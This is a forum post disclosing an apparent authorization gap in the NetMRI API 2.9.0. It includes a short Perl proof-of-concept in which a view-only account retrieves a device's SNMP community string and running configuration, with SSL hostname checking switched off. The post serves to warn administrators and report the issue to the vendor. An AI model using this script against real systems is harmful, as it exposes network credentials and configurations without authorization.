Beware the NetMRI API 2.9.0 has a Security Gap in it


Hello,

You might be cautious in having users with default - view role access to NetMRI and expect that they cannot read sensitive information when they can via a simple Perl script. There appears to be no authentication auditing either. I haven't tested updating NetMRI via a Perl script, but I'd assume that this would work as well. There is a case opened with Infoblox on the issue and it is being reviewed. I've included the Perl script below. You will need to edit in your specific authentication information if you want to test. Perl must be installed as well on your system (my apologies to the Perl experts, this was very Q&D).

# This script displays addresses for the device
# passed in from the command line.

use strict;
use warnings;
use NetMRI::API;
use NetMRI::API::Remote;
use NetMRI::API::Broker;

$ENV{PERL_LWP_SSL_VERIFY_HOSTNAME}=0;


print "Started\n";

# get the device id from the command
# line as the first argument.
my $device_id = shift @ARGV;

# Connect to the NetMRI.
# EDIT THE ACCOUNT INFORMATION BELOW
# FOR YOUR ENVIRONMENT
my $client = new NetMRI::API({ api_version => '2.9.0',
username => 'testuser',
password => 'testpassword',
url => 'https://a.b.c.d',
 });
print "Authenticated\n";

# retrieve the device
# see NetMRI::API::Broker::Device for other methods
# available on $client->broker->device
my $device = $client->broker->device->show({ DeviceID => $device_id })->{device};

print "Name: ", $device->DeviceName, "\n";
print "Type:", $device->DeviceType, "\n";
print "Assurance: ", $device->DeviceAssurance, "\n";
print "Vendor: ", $device->DeviceVendor, "\n";
print "Model: ", $device->DeviceModel, "\n";
print "IOS Version: ", $device->DeviceVersion, "\n";
print "Mgmt IP: ", $device->DeviceIPDotted, "\n";
print "MAC: ", $device->DeviceMAC, "\n";

my $snmpid = $client->broker->device->DeviceCommunity({ DeviceID => $device_id });
print "SNMP Community: ", $snmpid->{DeviceCommunity}, "\n";

my $runconfig = $client->broker->device->running_config_text({ DeviceID => $device_id });
print "\n\n\n##### RUNNING CONFIG #####\n\n", $runconfig->{running_config_text},"\n";
